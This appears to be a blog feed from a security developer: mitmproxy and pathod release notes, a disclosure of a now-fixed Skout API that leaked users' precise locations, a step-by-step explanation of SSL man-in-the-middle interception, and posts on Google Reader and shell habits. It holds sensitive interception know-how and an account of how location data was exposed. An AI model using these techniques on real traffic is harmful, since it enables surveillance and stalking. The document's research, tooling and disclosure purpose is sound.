that surrounds us. Our monitoring mechanisms seem to be stuck at the ends of
the intrusiveness spectrum. At one end, we have email notifications that demand
our attention until we start to ignore them or silence them with a filter. At
the other end we have passive status dashboards that require us to remember to
switch context and visually consult a different interface. Choir.io doesn't aim
to supplant either of these, but tries to fill in the blank portion of the
awareness spectrum between them.</p>
<p>When I sit at my desk, I can hear our server architecture humming away. There's
the subtle pitter-patter of hits to various webservers, the occasional clack of
an SSH login. Occasionally there is a chime when @alexdong pushes to Github,
followed shortly by the celebratory cheer of a server deploy. When I hear the
jarring note of a 500 server error, I switch context to view logs or a
dashboard, but otherwise my focus stays with my editor window. Choir is young,
but it's already become an indispensable part of my life.</p>
<h2 id="challenges-and-next-steps">Challenges and next steps</h2>
<p>There are a number of key questions that we'd like to answer with the help of
our intrepid early adopters. First among these is the question of soundscape
design. What makes a good sound pack? What is the right mix of intrusive and
non-intrusive sounds? How do we construct soundscapes that blend into the
background like natural sounds do? Another set of questions surrounds the API
and integration. What is the right blend of simplicity and power in the API?
Which services should we integrate with next?</p>
<p>There are some obvious next steps in the works. We recognize that sound pack
design is a deep problem with subjective solutions. So, letting users assemble,
edit and eventually share their own sound packs is high on our list of
priorities. Free-standing Choir.io player apps for Windows and OSX will also be
on the way soon, so you won't need to remember to keep a browser tab open.
Technical improvements to the API that are on the way include UDP and SSL
support.</p>
<p>Choir is trying to do something new, and we want as much feedback as early in
the process as possible. So, we've decided to start sending out invites today,
even though Choir is far from the polished system that it will be in a few
months. If you're brave, willing to give frank feedback, and want to help us
explore this exciting idea, please <a href="https://choir.io">request an invite</a>.</p>
mitmproxy 0.9.1
2013-06-16T00:00:00+00:00
2013-06-16T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_9_1/
<div class="media">
<a href="mitmproxy_0_9_1.png">
<img src="mitmproxy_0_9_1.png" />
</a>
</div>
<p>I'm happy to announce the release of <a href="http://mitmproxy.org">mitmproxy 0.9.1</a>.
This is a bugfix release, with no significant changes in behaviour.</p>
<p>As hinted in my previous release note, the project itself is also evolving. As
of this release, mitmproxy and its sister projects (<a href="http://pathod.net">pathod</a>
and <a href="https://github.com/mitmproxy/netlib">netlib</a>) are housed under a separate
organization on Github, rather than my own personal space:</p>
<p><a class="btn" href="https://github.com/mitmproxy">github.com/mitmproxy</a></p>
<p>I'm also very happy to welcome the first external core developer to the
mitmproxy project: <a href="http://maximilianhils.com/">Maximilian Hils</a>. Max is the
author of <a href="http://honeyproxy.org/">HoneyProxy</a>, a web analysis front-end for
mitmproxy. In the next few months, he'll be working on integrating and
expanding his work to become mitmproxy's official web interface. Max's efforts
will be sponsored by Google under their <a href="http://www.google-melange.com/gsoc/homepage/google/gsoc2013">Summer of
Code</a> program, and
will be mentored by the <a href="http://www.honeynet.org/">HoneyNet Project</a>.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>Use "correct" case for Content-Type headers added by mitmproxy.</li>
<li>Make UTF environment detection more robust.</li>
<li>Improved MIME-type detection for viewers.</li>
<li>Always read files in binary mode (Windows compatibility fix).</li>
<li>Correct PyOpenSSL dependency declaration.</li>
<li>Some developer documentation.</li>
</ul>
Skout: a devastating privacy vulnerability
2013-05-31T00:00:00+00:00
2013-05-31T00:00:00+00:00
https://corte.si/posts/security/skout/
<p>I've become a bit weary of the process of public vulnerability disclosure - I'm
much more likely nowadays to just drop companies an anonymous notice and move
on. Every so often, though, I come across an issue so egregious that talking
about it publicly seems like an imperative. This is one of them.</p>
<p>First, some background. Skout is a location-based mobile social network. The
idea is to allow people to meet others in their area, semi-anonymously, get to
know them, and then perhaps line up a meeting in meatspace. As far as I can
tell, a huge fraction of the userbase are singles, using Skout as an ad-hoc
dating app. Skout's scale is significant - they don't release exact user
numbers, but I've seen claims of more than 10 million users, and a growth rate
of a million users per month.</p>
<p>In 2012, Skout went through a major PR catastrophe, when its service was linked
to <a href="http://bits.blogs.nytimes.com/2012/06/12/after-rapes-involving-children-skout-a-flirting-app-faces-crisis/">no fewer than 3 separate rapes of
children</a>
by adult men posing as teenagers. Skout immediately suspended the service for
teenagers and went through a security re-vamp. A month later, <a href="http://blog.skout.com/2012/07/13/teens-welcome-back-to-skout/">teens were
allowed back</a>,
with Skout making much of its new safety system, "advanced, proprietary
algorithms" to weed out stalkers, and its long-term commitment to community
safety.</p>
<p>Given this background, the problem I found is simple but devastating. The Skout
mobile application talks to Skout's servers through a simple API. When a user's
profile is viewed, an unencrypted, plain-HTTP request is made to a path like
this:</p>
<pre style="background-color:#2b303b;">
<code>http://i22.skout.com/services/ServerService/getProfile
</code></pre>
<p>What's returned is a blob of XML containing the user's complete profile data.
In fact, the profile data is <em>too</em> complete, including some data
that is never actually used by the app. For example, we can see the
user's exact date of birth:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"><</span><span style="color:#bf616a;">ax213:birthdayDate</span><span style="color:#c0c5ce;">>xx/xx/1995</</span><span style="color:#bf616a;">ax213:birthdayDate</span><span style="color:#c0c5ce;">>
</span></code></pre>
<p>... but only the user's age in years is actually displayed. Most serious,
however, is the high-precision location information that is returned in the
ax213:homeLocation and ax213:location tags:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"><</span><span style="color:#bf616a;">ax213:latitude</span><span style="color:#c0c5ce;">>-xx.xxx</</span><span style="color:#bf616a;">ax213:latitude</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">ax213:longitude</span><span style="color:#c0c5ce;">>xxx.xxx</</span><span style="color:#bf616a;">ax213:longitude</span><span style="color:#c0c5ce;">>
</span></code></pre>
<p>The three decimal places of precision in the co-ordinates are enough to locate a
user to within about 110 meters north-south, and substantially less than that
east-west depending on the distance from the equator. Here's what that looks
like in a hypothetical example:</p>
<div class="media">
<a href="skout-map.png">
<img src="skout-map.png" />
</a>
</div>
<p>I used <a href="http://mitmproxy.org">mitmproxy</a> to observe Skout's traffic, but
because the request is unencrypted any tool that allows you to inspect network
traffic would be enough. The result is a stalker's wet dream - click on an
anonymous profile, watch your network traffic, and find out exactly where the
victim lives. I've also seen minors located at malls where they hang out, and
at their schools... Given the scale of Skout's userbase and the ease with which
the data can be obtained, I think there's a high likelihood that this issue has
already been used for unsavoury purposes.</p>
<p>I reported the vulnerability to Skout on the 24th of May. I'm happy to report
that they immediately realised the seriousness of the situation, and their API
stopped returning exact lat/long values a few hours later. Subsequent
correspondence with Niklas Lindstrom, Skout's CTO, confirmed that they were
taking steps to tighten security. I've encouraged Skout to speak about this
publicly - their userbase needs to know about the issue, and need to be
reassured that action is being taken to ensure that this type of privacy breach
won't ever recur.</p>
How mitmproxy works
2013-05-16T00:00:00+00:00
2013-05-16T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/howitworks/
<p>I started work on <a href="http://mitmproxy.org">mitmproxy</a> because I was frustrated
with the available interception tools. I had a long list of minor complaints -
they were insufficiently flexible, not programmable enough, mostly written in
Java (a language I don't enjoy), and so forth. My most serious problem, though,
was opacity. The best tools were all closed source and commercial. SSL
interception is a complicated and delicate process, and after a certain point,
not understanding precisely what your proxy is doing just doesn't fly.</p>
<p>The text below is now part of the <a href="http://mitmproxy.org/doc/index.html">official
documentation</a> of mitmproxy. It's a
detailed description of mitmproxy's interception process, and is more or less
the overview document I wish I had when I first started the project. I proceed
by example, starting with the simplest unencrypted explicit proxying, and
working up to the most complicated interaction - transparent proxying of
SSL-protected traffic<sup class="footnote-reference"><a href="#ssl">1</a></sup> in the presence of
<a href="http://en.wikipedia.org/wiki/Server_Name_Indication">SNI</a>.</p>
<h2 id="explicit-http">Explicit HTTP</h2>
<p>Configuring the client to use mitmproxy as an explicit proxy is the simplest and
most reliable way to intercept traffic. The proxy protocol is codified in the
<a href="http://www.ietf.org/rfc/rfc2068.txt">HTTP RFC</a>, so the behaviour of both the
client and the server is well defined, and usually reliable. In the simplest
possible interaction with mitmproxy, a client connects directly to the proxy and
makes a request that looks like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">GET http://example.com/index.html HTTP/1.1
</span></code></pre>
<p>This is a proxy GET request - an extended form of the vanilla HTTP GET request
that includes a scheme and host specification, and carries all the
information mitmproxy needs to relay the request upstream.</p>
<div class="media">
<a href="explicit.png">
<img src="explicit.png" />
</a>
</div>
<table class="table">
<tbody>
<tr>
<td><b>1</b></td>
<td>The client connects to the proxy and makes a request.</td>
</tr>
<tr>
<td><b>2</b></td>
<td>Mitmproxy connects to the upstream server and simply forwards
the request on.</td>
</tr>
</tbody>
</table>
<h2 id="explicit-https">Explicit HTTPS</h2>
<p>The process for an explicitly proxied HTTPS connection is quite different. The
client connects to the proxy and makes a request that looks like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">CONNECT example.com:443 HTTP/1.1
</span></code></pre>
<p>A conventional proxy can neither view nor manipulate an SSL-encrypted data
stream, so a CONNECT request simply asks the proxy to open a pipe between the
client and server. The proxy here is just a facilitator - it blindly forwards
data in both directions without knowing anything about the contents. The
negotiation of the SSL connection happens over this pipe, and the subsequent
flow of requests and responses are completely opaque to the proxy.</p>
<h3 id="the-mitm-in-mitmproxy">The MITM in mitmproxy</h3>
<p>This is where mitmproxy's fundamental trick comes into play. The MITM in its
name stands for Man-In-The-Middle - a reference to the process we use to
intercept and interfere with these theoretically opaque data streams. The basic
idea is to pretend to be the server to the client, and pretend to be the client
to the server, while we sit in the middle decoding traffic from both sides. The
tricky part is that the <a href="http://en.wikipedia.org/wiki/Certificate_authority">Certificate
Authority</a> system is
designed to prevent exactly this attack, by allowing a trusted third-party to
cryptographically sign a server's SSL certificates to verify that they are
legit. If this signature doesn't match or is from a non-trusted party, a secure
client will simply drop the connection and refuse to proceed. Despite the many
shortcomings of the CA system as it exists today, this is usually fatal to
attempts to MITM an SSL connection for analysis. Our answer to this conundrum
is to become a trusted Certificate Authority ourselves. Mitmproxy includes a
full CA implementation that generates interception certificates on the fly. To
get the client to trust these certificates, we <a href="http://mitmproxy.org/doc/ssl.html">register mitmproxy as a trusted
CA with the device manually</a>.</p>
<h3 id="complication-1-what-s-the-remote-hostname">Complication 1: What's the remote hostname?</h3>
<p>To proceed with this plan, we need to know the domain name to use in the
interception certificate - the client will verify that the certificate is for
the domain it's connecting to, and abort if this is not the case. At first
blush, it seems that the CONNECT request above gives us all we need - in this
example, both of these values are "example.com". But what if the client had
initiated the connection as follows:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">CONNECT 10.1.1.1:443 HTTP/1.1
</span></code></pre>
<p>Using the IP address is perfectly legitimate because it gives us enough
information to initiate the pipe, even though it doesn't reveal the remote
hostname.</p>
<p>Mitmproxy has a cunning mechanism that smooths this over - <a href="http://mitmproxy.org/doc/features/upstreamcerts.html">upstream
certificate sniffing</a>. As
soon as we see the CONNECT request, we pause the client part of the
conversation, and initiate a simultaneous connection to the server. We complete
the SSL handshake with the server, and inspect the certificates it used. Now,
we use the Common Name in the upstream SSL certificates to generate the dummy
certificate for the client. Voila, we have the correct hostname to present to
the client, even if it was never specified.</p>
<h3 id="complication-2-subject-alternative-name">Complication 2: Subject Alternative Name</h3>
<p>Enter the next complication. Sometimes, the certificate Common Name is not, in
fact, the hostname that the client is connecting to. This is because of the
optional <a href="http://en.wikipedia.org/wiki/SubjectAltName">Subject Alternative
Name</a> field in the SSL certificate
that allows an arbitrary number of alternative domains to be specified. If the
expected domain matches any of these, the client will proceed, even though the
domain doesn't match the certificate Common Name. The answer here is simple:
when we extract the CN from the upstream cert, we also extract the SANs, and add
them to the generated dummy certificate.</p>
<h3 id="complication-3-server-name-indication">Complication 3: Server Name Indication</h3>
<p>One of the big limitations of vanilla SSL is that each certificate requires its
own IP address. This means that you can't do virtual hosting where multiple
domains with independent certificates share the same IP address. In a world
with a rapidly shrinking IPv4 address pool this is a problem, and we have a
solution in the form of the <a href="http://en.wikipedia.org/wiki/Server_Name_Indication">Server Name
Indication</a> extension to
the SSL and TLS protocols. This lets the client specify the remote server name
at the start of the SSL handshake, which then lets the server select the right
certificate to complete the process.</p>
<p>SNI breaks our upstream certificate sniffing process, because when we connect
without using SNI, we get served a default certificate that may have nothing to
do with the certificate expected by the client. The solution is another tricky
complication to the client connection process. After the client connects, we
allow the SSL handshake to continue until just <em>after</em> the SNI value has been
passed to us. Now we can pause the conversation, and initiate an upstream
connection using the correct SNI value, which then serves us the correct
upstream certificate, from which we can extract the expected CN and SANs.</p>
<p>There's another wrinkle here. Due to a limitation of the SSL library mitmproxy
uses, we can't detect that a connection <em>hasn't</em> sent an SNI request until it's
too late for upstream certificate sniffing. In practice, we therefore make a
vanilla SSL connection upstream to sniff non-SNI certificates, and then discard
the connection if the client sends an SNI notification. If you're watching your
traffic with a packet sniffer, you'll see two connections to the server when an
SNI request is made, the first of which is immediately closed after the SSL
handshake. Luckily, this is almost never an issue in practice.</p>
<h3 id="putting-it-all-together">Putting it all together</h3>
<p>Let's put all of this together into the complete explicitly proxied HTTPS flow.</p>
<div class="media">
<a href="explicit_https.png">
<img src="explicit_https.png" />
</a>
</div>
<table class="table">
<tbody>
<tr>
<td><b>1</b></td>
<td>The client makes a connection to mitmproxy, and issues an HTTP
CONNECT request.</td>
</tr>
<tr>
<td><b>2</b></td>
<td>Mitmproxy responds with a 200 Connection Established, as if it
has set up the CONNECT pipe.</td>
</tr>
<tr>
<td><b>3</b></td>
<td>The client believes it's talking to the remote server, and
initiates the SSL connection. It uses SNI to indicate the hostname
it is connecting to.</td>
</tr>
<tr>
<td><b>4</b></td>
<td>Mitmproxy connects to the server, and establishes an SSL
connection using the SNI hostname indicated by the client.</td>
</tr>
<tr>
<td><b>5</b></td>
<td>The server responds with the matching SSL certificate, which
contains the CN and SAN values needed to generate the interception
certificate.</td>
</tr>
<tr>
<td><b>6</b></td>
<td>Mitmproxy generates the interception cert, and continues the
client SSL handshake paused in step 3.</td>
</tr>
<tr>
<td><b>7</b></td>
<td>The client sends the request over the established SSL
connection.</td>
</tr>
<tr>
<td><b>8</b></td>
<td>Mitmproxy passes the request on to the server over the SSL
connection initiated in step 4.</td>
</tr>
</tbody>
</table>
<h2 id="transparent-http">Transparent HTTP</h2>
<p>When a transparent proxy is used, the HTTP/S connection is redirected into a
proxy at the network layer, without any client configuration being required.
This makes transparent proxying ideal for those situations where you can't
change client behaviour - proxy-oblivious Android applications being a common
example.</p>
<p>To achieve this, we need to introduce two extra components. The first is a
redirection mechanism that transparently reroutes a TCP connection destined for
a server on the Internet to a listening proxy server. This usually takes the
form of a firewall on the same host as the proxy server -
<a href="http://www.netfilter.org/">iptables</a> on Linux or
<a href="http://en.wikipedia.org/wiki/PF_(firewall)">pf</a> on OSX. Once the client has
initiated the connection, it makes a vanilla HTTP request, which might look
something like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">GET /index.html HTTP/1.1
</span></code></pre>
<p>Note that this request differs from the explicit proxy variation, in that it
omits the scheme and hostname. How, then, do we know which upstream host to
forward the request to? The routing mechanism that has performed the
redirection keeps track of the original destination for us. Each routing
mechanism has a different way of exposing this data, so this introduces the
second component required for working transparent proxying: a host module that
knows how to retrieve the original destination address from the router. In
mitmproxy, this takes the form of a built-in set of
<a href="https://github.com/cortesi/mitmproxy/tree/master/libmproxy/platform">modules</a>
that know how to talk to each platform's redirection mechanism. Once we have
this information, the process is fairly straightforward.</p>
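<p>As a sketch of what such a platform module does on Linux (assuming an iptables REDIRECT setup; the option number and struct layout come from the Linux netfilter headers, and the function names here are illustrative, not mitmproxy's actual internals):</p>

```python
import socket
import struct

# Linux-specific: the SO_ORIGINAL_DST socket option used by iptables
# REDIRECT/DNAT. The socket module doesn't export it, so we define it.
SO_ORIGINAL_DST = 80

def parse_original_dst(raw: bytes) -> tuple[str, int]:
    """Decode the sockaddr_in returned by getsockopt(SOL_IP, SO_ORIGINAL_DST).

    Layout: 2 bytes address family, 2 bytes port (network byte order),
    4 bytes IPv4 address, 8 bytes padding."""
    port, packed_ip = struct.unpack_from("!2xH4s", raw)
    return socket.inet_ntoa(packed_ip), port

def original_dst(sock: socket.socket) -> tuple[str, int]:
    # Ask the kernel where the client actually wanted to go before
    # the firewall rerouted it to us.
    raw = sock.getsockopt(socket.SOL_IP, SO_ORIGINAL_DST, 16)
    return parse_original_dst(raw)
```

<p>OSX's pf exposes the same information through a different interface (ioctls on /dev/pf), which is why a per-platform module is needed at all.</p>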
<div class="media">
<a href="transparent.png">
<img src="transparent.png" />
</a>
</div>
<table class="table">
<tbody>
<tr>
<td><b>1</b></td>
<td>The client makes a connection to the server.</td>
</tr>
<tr>
<td><b>2</b></td>
<td>The router redirects the connection to mitmproxy, which is
typically listening on a local port of the same host. Mitmproxy
then consults the routing mechanism to establish what the original
destination was.</td>
</tr>
<tr>
<td><b>3</b></td>
<td>Now, we simply read the client's request...</td>
</tr>
<tr>
<td><b>4</b></td>
<td>... and forward it upstream.</td>
</tr>
</tbody>
</table>
<h2 id="transparent-https">Transparent HTTPS</h2>
<p>The first step is to determine whether we should treat an incoming connection
as HTTPS. The mechanism for doing this is simple - we use the routing mechanism
to find out what the original destination port is. By default, we treat all
traffic destined for ports 443 and 8443 as SSL.</p>
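<p>In code, the default rule amounts to nothing more than a port check (a minimal sketch of the heuristic just described; a real proxy would make the port set configurable):</p>

```python
# Ports whose redirected traffic we treat as SSL by default.
SSL_PORTS = {443, 8443}

def treat_as_ssl(original_dst_port: int) -> bool:
    # The original destination port comes from the routing mechanism,
    # not from the connection itself.
    return original_dst_port in SSL_PORTS
```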
<p>From here, the process is a merger of the methods we've described for
transparently proxying HTTP, and explicitly proxying HTTPS. We use the routing
mechanism to establish the upstream server address, and then proceed as for
explicit HTTPS connections to establish the CN and SANs, and cope with SNI.</p>
<div class="media">
<a href="transparent_https.png">
<img src="transparent_https.png" />
</a>
</div>
<table class="table">
<tbody>
<tr>
<td><b>1</b></td>
<td>The client makes a connection to the server.</td>
</tr>
<tr>
<td><b>2</b></td>
<td>The router redirects the connection to mitmproxy, which is
typically listening on a local port of the same host. Mitmproxy
then consults the routing mechanism to establish what the original
destination was.</td>
</tr>
<tr>
<td><b>3</b></td>
<td>The client believes it's talking to the remote server, and
initiates the SSL connection. It uses SNI to indicate the hostname
it is connecting to.</td>
</tr>
<tr>
<td><b>4</b></td>
<td>Mitmproxy connects to the server, and establishes an SSL
connection using the SNI hostname indicated by the client.</td>
</tr>
<tr>
<td><b>5</b></td>
<td>The server responds with the matching SSL certificate, which
contains the CN and SAN values needed to generate the interception
certificate.</td>
</tr>
<tr>
<td><b>6</b></td>
<td>Mitmproxy generates the interception cert, and continues the
client SSL handshake paused in step 3.</td>
</tr>
<tr>
<td><b>7</b></td>
<td>The client sends the request over the established SSL
connection.</td>
</tr>
<tr>
<td><b>8</b></td>
<td>Mitmproxy passes the request on to the server over the SSL
connection initiated in step 4.</td>
</tr>
</tbody>
</table>
<div class="footnote-definition" id="ssl"><sup class="footnote-definition-label">1</sup>
<p>I use "SSL" to refer to both SSL and TLS in the generic sense, unless otherwise specified.</p>
</div>
pathod 0.9
2013-05-16T00:00:00+00:00
2013-05-16T00:00:00+00:00
https://corte.si/posts/code/pathod/announce0_9/
<p>I've just released <a href="http://pathod.net">pathod 0.9</a>, my toolset for crafting
malicious and interesting HTTP traffic. Apart from the usual range of stability
improvements and bugfixes, this release introduces a major new set of features:
proxy support. <a href="http://pathod.net/docs/pathoc">Pathoc</a>, the client, has sprouted
support for vanilla proxy connections, and is also able to tunnel through
proxies using CONNECT. <a href="http://pathod.net/docs/pathod">Pathod</a>, the server, will
now respond to proxy requests as well as straight HTTP, and will treat CONNECT
requests as SSL with on-the-fly generation of dummy certificates.</p>
<p>The Pathod changes in particular open a whole new range of possibilities for
fuzzing and other mischief. Any client with proxy support can be directed at
Pathod, which can then impersonate the upstream server and return the creatively
malicious response of your choice.</p>
<p>There have also been some organizational changes. This is the first release
based on <a href="http://github.com/cortesi/netlib">netlib</a>, the gonzo networking
library pathod now shares with <a href="http://mitmproxy.org">mitmproxy</a>. Over the next
while, pathod and mitmproxy will move closer together. As a sign of this, the
major version numbers between these projects are now synchronized.</p>
mitmproxy 0.9
2013-05-15T00:00:00+00:00
2013-05-15T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_9/
<div class="media">
<a href="mitmproxy_0_9.png">
<img src="mitmproxy_0_9.png" />
</a>
</div>
<p>I'm happy to announce the release of <a href="http://mitmproxy.org">mitmproxy 0.9</a>. This
is a major release, with huge improvements to mitmproxy pretty much across the
board. So much has happened in the year since the last release that it's
difficult to pick out the headlines. Mitmproxy is now faster, more scalable, and
works in more tricky corner cases than ever before. Full transparent mode
support has landed for both Linux and OSX. Content decoding is much nicer, with
a slew of new targets like
<a href="http://en.wikipedia.org/wiki/Action_Message_Format">AMF</a> and <a href="https://code.google.com/p/protobuf/">Protocol
Buffers</a>. We now have a WSGI container that
allows you to host web apps right in the proxy. In addition to this, there is a
myriad of new features, bugfixes and other small improvements.</p>
<p>There are also changes afoot in the project itself. As a first step, I've moved
mitmproxy from the GPLv3 to an MIT license. I hope that this will make it easier
for people to use the project in more contexts. Keep an eye out for more changes
along these lines soon, geared to broadening participation in the project.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>Upstream certs mode is now the default.</li>
<li>Add a WSGI container that lets you host in-proxy web applications.</li>
<li>Full transparent proxy support for Linux and OSX.</li>
<li>Introduce netlib, a common codebase for <a href="http://github.com/cortesi/netlib">mitmproxy and
pathod</a>.</li>
<li>Full support for SNI.</li>
<li>Color palettes for mitmproxy, tailored for light and dark terminal
backgrounds.</li>
<li>Stream flows to file as responses arrive with the "W" shortcut in
mitmproxy.</li>
<li>Extend the filter language, including ~d domain match operator, ~a to
match asset flows (js, images, css).</li>
<li>Follow mode in mitmproxy ("F" shortcut) to "tail" flows as they arrive.</li>
<li>--dummy-certs option to specify and preserve the dummy certificate
directory.</li>
<li>Server replay from the current captured buffer.</li>
<li>Huge improvements in content views. We now have viewers for AMF, HTML,
JSON, Javascript, images, XML, URL-encoded forms, as well as hexadecimal
and raw views.</li>
<li>Add Set Headers, analogous to replacement hooks. Defines headers that are set
on flows, based on a matching pattern.</li>
<li>A graphical editor for path components in mitmproxy.</li>
<li>A small set of standard user-agent strings, which can be used easily in
the header editor.</li>
<li>Proxy authentication to limit access to mitmproxy.</li>
</ul>
Google, destroyer of ecosystems
2013-03-14T00:00:00+00:00
2013-03-14T00:00:00+00:00
https://corte.si/posts/socialmedia/rip-google-reader/
<p>Google has finally shut down a service I actually care about - <a href="http://googlereader.blogspot.co.nz/2013/03/powering-down-google-reader.html">Google Reader
will die a graceless, undignified death on July 1,
2013</a>.
The only way Google could inconvenience me more would be to shut down search
itself, and yet - I'm not angry that Google is shutting Reader down. I'm furious
that they ever entered the RSS game at all. Consider this quote from a
TechCrunch <a href="http://techcrunch.com/2006/01/10/searchfox-to-shut-down/">article in January
2006</a>. Here, Michael
Arrington ends an article about the shutdown of a feed reader service with a
statement that seems truly bizarre today:</p>
<blockquote>
<p>The RSS reader space is becoming hyper competitive, with dozens of different
choices for readers.</p>
</blockquote>
<p>A hyper competitive space with dozens of choices? Reader made its first public
appearance a couple of months before this, in October 2005. I remember this
period well - it was a time of immense excitement, when RSS seemed to be the
future, the news ecosystem was vibrant, and this thing called the blogosphere,
fueled by peer subscription, was doubling in size every six months. It was into
this magic garden that Google wandered, like a giant toddler leaving destruction
in its wake. Reader was undeniably a good product, but its best quality was
also its worst: it was free. Subsidized by Google's immense search profits, it
never had to earn its keep, and its competitors started to die. Over time, the
"hyper competitive" RSS reader market turned into a monoculture. Today, on the
eve of its shutdown, RSS more or less means "Google Reader" to a large fraction
of readers, to the extent that even the best feed readers on iOS are just
Google Reader clients<sup class="footnote-reference"><a href="#1">1</a></sup>.</p>
<p>The sudden shock of Reader's closure will harm a news ecosystem that I <a href="https://corte.si/posts/socialmedia/trouble-with-social-news/">already
believe to be deeply ill</a>.
Google Reader is not just a core part of my information diet - it's also the
most direct channel I have to readers of this blog. As of today, the Reader
subscriber count for <a href="http://corte.si">corte.si</a> stands at about 3 times the
total number of other subscribers combined. Some of these readers will migrate
to other services and stay in touch, but many will inevitably abandon the idea
of direct subscription to blogs entirely. In the next few months, tens of
thousands of small blogs will lose direct contact with a large fraction of their
readers.</p>
<p>The truth is this: Google destroyed the RSS feed reader ecosystem with a
subsidized product, stifling its competitors and killing innovation. It then
neglected Google Reader itself for years, after it had effectively become the
only player. Today it does further damage by buggering up the already
beleaguered links between publishers and readers. It would have been better for
the Internet if Reader had never been at all.</p>
<div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup>
<p>Yes, I'm aware that there are a few hardy outliers still playing in this
place. My own logs show that their reach is insignificant, though, and when I
tried to shift my subscriptions about a year ago, there was nothing as good as
Reader itself. Once <a href="http://www.newsblur.com">NewsBlur's</a> servers have
recovered, I definitely plan to give it another shot.</p>
</div>
Things I found on GitHub: aspell custom dictionary entries
2013-02-26T00:00:00+00:00
2013-02-26T00:00:00+00:00
https://corte.si/posts/hacks/github-spellingdicts/
<p>I've been doing a series of posts looking at data gathered with
<a href="https://github.com/cortesi/ghrabber">ghrabber</a>, a simple tool I wrote that lets
you grab files matching a search specification from GitHub. Last week, I looked
at <a href="https://corte.si/posts/hacks/github-shhistory/">shell history</a> in the broad, and
then specifically at <a href="https://corte.si/posts/hacks/github-pipechains/">pipe chains</a>.
Today, I move on to something different - custom <a href="http://aspell.net/">aspell</a>
dictionaries. When aspell finds a word it doesn't recognize, the user is
prompted to correct it, ignore it, or add it to a custom dictionary so that it
will be recognized as correct in future. These words are written to the user's
custom dictionary - a file named <strong>.aspell_en_pw</strong> that lives in the user's
home directory. It turns out that 30 people have checked aspell dictionaries
into GitHub, containing a total of 9501 custom words. The chart below shows the
top 50 words, with the X-axis showing the percentage of files the word appeared
in.</p>
<div class="media">
<a href="aspell.png">
<img src="aspell.png" />
</a>
</div>
<p>There were a few requests for the raw data behind the previous two posts, so
this time round you can also <a href="./aspell-all.csv">download a CSV file</a>
with the occurrence totals for each word in the dataset.</p>
Things I found on GitHub: pipe chains
2013-02-22T00:00:00+00:00
2013-02-22T00:00:00+00:00
https://corte.si/posts/hacks/github-pipechains/
<p>Earlier this week I published <a href="https://github.com/cortesi/ghrabber">ghrabber</a>, a
simple tool that lets you grab files matching an arbitrary search specification
from GitHub. I used ghrabber to retrieve all the bash_history and zsh_history
files accidentally checked in to repos, and took <a href="http://corte.si/posts/hacks/github-shhistory/index.html">a light look at the dataset
with some simple
graphs</a>. In total, I
obtained 234 shell history files with 165k individual command entries. This is a
very rare opportunity to "shoulder-surf", to actually see what people <em>do</em> at
the command prompt, and perhaps get some insights into how to improve things.</p>
<p>Along those lines, today's post looks at pipe chains - that is, compound
commands that pipe the output of one command to another. The pipe operator lies
at the core of the Unix command-line philosophy. The fact that we can easily
compose complex operations is the reason why we are able to write small tools
that "do one thing well" without losing generality. The shell history data on
Github can give us some real data about what people do with composed commands,
and how they do it.</p>
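<p>Extracting these chains from raw history lines can be done with a rough heuristic - split on the pipe character and keep the first token of each stage. This is a sketch of the idea, not a real shell parser (it will mishandle <code>||</code>, pipes inside quotes, and so on):</p>

```python
import shlex

def pipe_chain(command: str) -> tuple[str, ...]:
    """Reduce a shell command to the sequence of program names it pipes
    together, e.g. "ps aux | grep ssh" -> ("ps", "grep")."""
    stages = []
    for stage in command.split("|"):
        try:
            tokens = shlex.split(stage)
        except ValueError:
            return ()  # unbalanced quotes - skip this line entirely
        if tokens:
            stages.append(tokens[0])
    return tuple(stages)
```

<p>Counting the resulting tuples across the dataset is then a one-liner with <code>collections.Counter</code>.</p>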
<div class="media">
<a href="pipechains.png">
<img src="pipechains.png" />
</a>
</div>
<p>It turns out that about 2% of all commands issued on the command-line use
pipes. The graph above shows the prevalence of the most common pipe chains - that
is, what percentage of the users in my sample used each chain. There's a lot of
fascinating stuff we can read straight from this image.</p>
<p>Starting at the top, the first thing we notice is how widely used the <strong>ps |
grep</strong> chain is. About 17% of users in my sample used this chain - given the
type of data we have, the real-world prevalence would surely be higher still.
I've just been extolling the virtues of small tools and composability, but in
this case practicality should beat purity. I suggest that everyone should have
a command-alias similar to this in their shell configuration:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#96b5b4;">alias </span><span style="color:#8fa1b3;">pg</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">ps aux | grep</span><span style="color:#c0c5ce;">"
</span></code></pre>
<p>I've added this to my .zshrc today, and I've already used it twice.</p>
<p>Next up, we have the <strong>ls | grep</strong> pipes. The vast majority of uses here could
actually be accomplished using the shell's filename generation mechanism. This
ranges from simple redundancies like grepping for file extensions, to
performing quite complex matching operations that could be done using the
shell's advanced glob operations. I'm guilty of this myself - I rarely use
features like recursive globbing, expansions using character ranges, case
insensitive globbing, and so forth. I've brushed up on <a href="http://linux.die.net/man/1/zshexpn">filename expansion for
my chosen shell</a>, and perhaps you should
too.</p>
<p>The last thing I want to point out is a pattern that's genuinely dangerous -
<strong>curl | bash</strong>, along with its cousins <strong>curl | sh</strong> and <strong>wget | sh</strong>.
Unfortunately, this has become the recommended installation pattern for some
tools - the vast majority of invocations here are for <a href="https://rvm.io/">RVM</a> and
<a href="http://yeoman.io/">Yeoman</a>. I don't think it's a good idea to pipe anything
from the web straight into a local shell, but the situation is made
particularly dire by the fact that almost half of these invocations are either
over plain HTTP or explicitly turn certificate validation off.</p>
<p>I'll stop here, although there are interesting things to say about nearly every
entry in the graph above. Next week, I'll move on from the shell history
sample and look at some other juicy datasets extracted using ghrabber.</p>
Things I found on GitHub: shell history
2013-02-19T00:00:00+00:00
2013-02-19T00:00:00+00:00
https://corte.si/posts/hacks/github-shhistory/
